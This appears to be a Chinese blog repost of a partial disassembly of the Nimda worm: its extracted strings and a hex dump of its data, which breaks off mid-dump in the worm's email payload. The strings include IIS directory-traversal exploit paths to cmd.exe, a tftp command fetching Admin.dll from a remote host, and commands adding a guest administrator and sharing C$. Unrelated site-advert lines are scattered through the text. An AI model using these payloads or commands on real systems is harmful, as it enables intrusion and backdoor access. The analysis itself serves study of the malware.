NIMDA娜妲(尼姆达)病毒部分反汇编代码

病毒数据串
" .exe"
" -dontrunold"
" -qusery9bnow"
"% Privileged Time"
"% Processor Time"
"% User Time"
"%ld %ld %ld"
"%ld %ld"
"%ls"
"."
".."
".asp"
".doc"
".eml"
".exe"
".htm"
".nws"
"/_mem_bin/..%255c../..%255c../..%255c.."
"/_vti_bin/..%255c../..%255c../..%255c.."
"/Admin.dll"
"/c"
"/d"
"/MSADC"
"/msadc/..%255c../..%255c../..%255c/..%c1%1c../"
"/root.exe?/c+"
"/scripts"
"/scripts/..%%35%63.."
"/scripts/..%%35c.."
"/scripts/..%25%35%63.."
"/scripts/..%252f.."
"/scripts/..%255c.."
"/scripts/..%c0%2f.."

play.bitsCN.com累了吗玩一下吧


"/scripts/..%c0%af.."
"/scripts/..%c1%1c.."
"/scripts/..%c1%9c.."
"/winnt/system32/cmd.exe?/c+"
"/"
"/*.*"
"//"
"//%s"
"/load.exe"
"/mmc.exe"
"/readme*.exe"
"/readme.eml"
"/riched20.dll"
"/system.ini"
"/wininit.ini"
"__WSAFDIsSet"
">"
"aabbcc"
"admin.dll"
"Admin.dll"
"bind"
"boot"
"c:"
"C:/"
"c:/Admin.dll"
"Cache"
"closesocket"
"connect"
"Context Switches/sec"
"Counter 009"
"Counters"
"CreateRemoteThread"
"d:/Admin.dll"
"DATA"
"default" 需要什么来搜一搜吧so.bitsCN.com
"dir"
"dontrunold"
"e:/Admin.dll"
"Elapsed Time"
"Exec Read Only"
"Exec Read/Write"
"Exec Write Copy"
"Executable"
"EXPLORER"
"explorer.exe load.exe -dontrunold"
"Flags"
"From: <"
"fsdhqherwqi2001"
"GET %s HTTP/1.0"
"gethostbyname"
"gethostname"
"HeapAlloc"
"HeapCompact"
"HeapCreate"
"HeapDestroy"
"HeapFree"
"HELO "
"Hidden"
"HideFileExt"
"html"
"htonl"
"htons"
"ID Process"
"ID Thread"
"Image Space Exec Read Only"
"Image Space Exec Read/Write"
"Image Space Exec Write Copy"

so.bitsCN.com网管资料库任你搜


"Image Space Executable"
"Image Space No Access"
"Image Space Read Only"
"Image Space Read/Write"
"Image Space Write Copy"
"Image"
"index"
"inet_addr"
"inet_ntoa"
"ioctlsocket"
"KERNEL32.DLL"
"Last Counter"
"localgroup Administrators guest "
"localgroup Guests guest /add"
"MAIL FROM: <"
"main"
"MAPI32.DLL"
"MAPIFindNext"
"MAPIFreeBuffer"
"MAPILogoff"
"MAPILogon"
"MAPIReadMail"
"MAPIResolveName"
"MAPISendMail"
"Mapped Space Exec Read Only"
"Mapped Space Exec Read/Write"
"Mapped Space Exec Write Copy"
"Mapped Space Executable"
"Mapped Space No Access" dl.bitsCN.com网管软件下载
"Mapped Space Read Only"
"Mapped Space Read/Write"
"Mapped Space Write Copy"
"mep"
"MIME-Version: 1.0"
"MPR.DLL"
"NameServer"
"net"
"No Access"
"ntohl"
"ntohs"
"NUL="
"NULL"
"octet"
"open"
"Page Faults/sec"
"Parm1enc"
"Parm2enc"
"Path"
"Personal"
"Priority Base"
"Priority Current"
"Private Bytes"
"Process Address Space"
"Process"
"QUIT"
"qusery9bnow"
"RCPT TO: <"
"Read Only"
"Read/Write"
"readme"
"recv"
"recvfrom"
"RegisterServiceProcess"
"Remark" play.bitsCN.com累了吗玩一下吧
"Reserved Space Exec Read Only"
"Reserved Space Exec Read/Write"
"Reserved Space Exec Write Copy"
"Reserved Space Executable"
"Reserved Space No Access"
"Reserved Space Read Only"
"Reserved Space Read/Write"
"Reserved Space Write Copy"
"riched20.dll"
"select"
"send"
"sendto"
"share c$=c:/"
"Shell"
"SHELL32.DLL"
"ShellExecuteA"
"ShowSuperHidden"
"socket"
"software/microsoft/windows nt/currentversion/p"
"SOFTWARE/Microsoft/Windows/CurrentVersion/App "
"Software/Microsoft/Windows/CurrentVersion/Expl"
"SOFTWARE/Microsoft/Windows/CurrentVersion/Netw"
"Start Address"
"Subject: "
"SYSTEM/CurrentControlSet/Services/lanmanserver" 需要什么来搜一搜吧so.bitsCN.com
"SYSTEM/CurrentControlSet/Services/Tcpip/Parame"
"System/CurrentControlSet/Services/VxD/MSTCP"
"tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20"
"Thread Details"
"Thread"
"Type"
"user guest """
"user guest /active"
"user guest /add"
"User PC"
"Version"
"Virtual Bytes Peak"
"Virtual Bytes"
"VirtualAllocEx"
"VirtualFreeEx"
"VirtualProtectEx"
"VirtualQueryEx"
"winzip32.exe"
"WNetAddConnection2A"
"WNetCancelConnection2A"
"WNetCloseEnum"
"WNetEnumResourceA"
"WNetOpenEnumA"
"Working Set Peak"
"Working Set"
"Write Copy"
"ws2_32.dll"
"WSACleanup"
"WSAStartup"

blog.bitsCN.com网管博客等你来搏


代码数据
:36179000 00 00 00 00 00 00 00 00 ........
:36179008 00 00 00 00 00 00 00 00 ........
:36179010 2E 00 00 00 53 79 73 74 ....Syst
:36179018 65 6D 5C 43 75 72 72 65 em/Curre
:36179020 6E 74 43 6F 6E 74 72 6F ntContro
:36179028 6C 53 65 74 5C 53 65 72 lSet/Ser
:36179030 76 69 63 65 73 5C 56 78 vices/Vx
:36179038 44 5C 4D 53 54 43 50 00 D/MSTCP.
:36179040 4E 61 6D 65 53 65 72 76 NameServ
:36179048 65 72 00 00 53 59 53 54 er..SYST
:36179050 45 4D 5C 43 75 72 72 65 EM/Curre
:36179058 6E 74 43 6F 6E 74 72 6F ntContro
:36179060 6C 53 65 74 5C 53 65 72 lSet/Ser
:36179068 76 69 63 65 73 5C 54 63 vices/Tc
:36179070 70 69 70 5C 50 61 72 61 pip/Para
:36179078 6D 65 74 65 72 73 5C 49 meters/I
:36179080 6E 74 65 72 66 61 63 65 nterface
:36179088 73 5C 00 00 53 59 53 54 s/..SYST
:36179090 45 4D 5C 43 75 72 72 65 EM/Curre
:36179098 6E 74 43 6F 6E 74 72 6F ntContro
:361790A0 6C 53 65 74 5C 53 65 72 lSet/Ser

bbs.bitsCN.com国内最早的网管论坛


:361790A8 76 69 63 65 73 5C 54 63 vices/Tc
:361790B0 70 69 70 5C 50 61 72 61 pip/Para
:361790B8 6D 65 74 65 72 73 5C 49 meters/I
:361790C0 6E 74 65 72 66 61 63 65 nterface
:361790C8 73 00 00 00 43 6F 6E 63 s...Conc
:361790D0 65 70 74 20 56 69 72 75 ept Viru
:361790D8 73 28 43 56 29 20 56 2E s(CV) V.
:361790E0 35 2C 20 43 6F 70 79 72 5, Copyr
:361790E8 69 67 68 74 28 43 29 32 ight(C)2
:361790F0 30 30 31 20 20 52 2E 50 001 R.P
:361790F8 2E 43 68 69 6E 61 00 00 .China..
:36179100 4D 49 4D 45 2D 56 65 72 MIME-Ver
:36179108 73 69 6F 6E 3A 20 31 2E sion: 1.
:36179110 30 0D 0A 43 6F 6E 74 65 0..Conte
:36179118 6E 74 2D 54 79 70 65 3A nt-Type:
:36179120 20 6D 75 6C 74 69 70 61 multipa
:36179128 72 74 2F 72 65 6C 61 74 rt/relat
:36179130 65 64 3B 0D 0A 09 74 79 ed;...ty
:36179138 70 65 3D 22 6D 75 6C 74 pe="mult
:36179140 69 70 61 72 74 2F 61 6C ipart/al
:36179148 74 65 72 6E 61 74 69 76 ternativ
so.bitsCN.com网管资料库任你搜

:36179150 65 22 3B 0D 0A 09 62 6F e";...bo
:36179158 75 6E 64 61 72 79 3D 22 undary="
:36179160 3D 3D 3D 3D 5F 41 42 43 ====_ABC
:36179168 31 32 33 34 35 36 37 38 12345678
:36179170 39 30 44 45 46 5F 3D 3D 90DEF_==
:36179178 3D 3D 22 0D 0A 58 2D 50 =="..X-P
:36179180 72 69 6F 72 69 74 79 3A riority:
:36179188 20 33 0D 0A 58 2D 4D 53 3..X-MS
:36179190 4D 61 69 6C 2D 50 72 69 Mail-Pri
:36179198 6F 72 69 74 79 3A 20 4E ority: N
:361791A0 6F 72 6D 61 6C 0D 0A 58 ormal..X
:361791A8 2D 55 6E 73 65 6E 74 3A -Unsent:
:361791B0 20 31 0D 0A 0D 0A 2D 2D 1....--
:361791B8 3D 3D 3D 3D 5F 41 42 43 ====_ABC
:361791C0 31 32 33 34 35 36 37 38 12345678
:361791C8 39 30 44 45 46 5F 3D 3D 90DEF_==
:361791D0 3D 3D 0D 0A 43 6F 6E 74 ==..Cont
:361791D8 65 6E 74 2D 54 79 70 65 ent-Type
:361791E0 3A 20 6D 75 6C 74 69 70 : multip
:361791E8 61 72 74 2F 61 6C 74 65 art/alte
:361791F0 72 6E 61 74 69 76 65 3B rnative; bbs.bitsCN.com国内最早的网管论坛
:361791F8 0D 0A 09 62 6F 75 6E 64 ...bound
:36179200 61 72 79 3D 22 3D 3D 3D ary="===
:36179208 3D 5F 41 42 43 30 39 38 =_ABC098
:36179210 37 36 35 34 33 32 31 44 7654321D
:36179218 45 46 5F 3D 3D 3D 3D 22 EF_===="
:36179220 0D 0A 0D 0A 2D 2D 3D 3D ....--==
:36179228 3D 3D 5F 41 42 43 30 39 ==_ABC09
:36179230 38 37 36 35 34 33 32 31 87654321
:36179238 44 45 46 5F 3D 3D 3D 3D DEF_====
:36179240 0D 0A 43 6F 6E 74 65 6E ..Conten
:36179248 74 2D 54 79 70 65 3A 20 t-Type:
:36179250 74 65 78 74 2F 68 74 6D text/htm
:36179258 6C 3B 0D 0A 09 63 68 61 l;...cha
:36179260 72 73 65 74 3D 22 69 73 rset="is
:36179268 6F 2D 38 38 35 39 2D 31 o-8859-1
:36179270 22 0D 0A 43 6F 6E 74 65 "..Conte
:36179278 6E 74 2D 54 72 61 6E 73 nt-Trans
:36179280 66 65 72 2D 45 6E 63 6F fer-Enco
:36179288 64 69 6E 67 3A 20 71 75 ding: qu
:36179290 6F 74 65 64 2D 70 72 69 oted-pri
:36179298 6E 74 61 62 6C 65 0D 0A ntable..
so.bitsCN.com网管资料库任你搜

:361792A0 0D 0A 0D 0A 3C 48 54 4D ....<HTM
:361792A8 4C 3E 3C 48 45 41 44 3E L><HEAD>
:361792B0 3C 2F 48 45 41 44 3E 3C </HEAD><
:361792B8 42 4F 44 59 20 62 67 43 BODY bgC
:361792C0 6F 6C 6F 72 3D 33 44 23 olor=3D#
:361792C8 66 66 66 66 66 66 3E 0D ffffff>.
:361792D0 0A 3C 69 66 72 61 6D 65 .<iframe
:361792D8 20 73 72 63 3D 33 44 63 sr
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值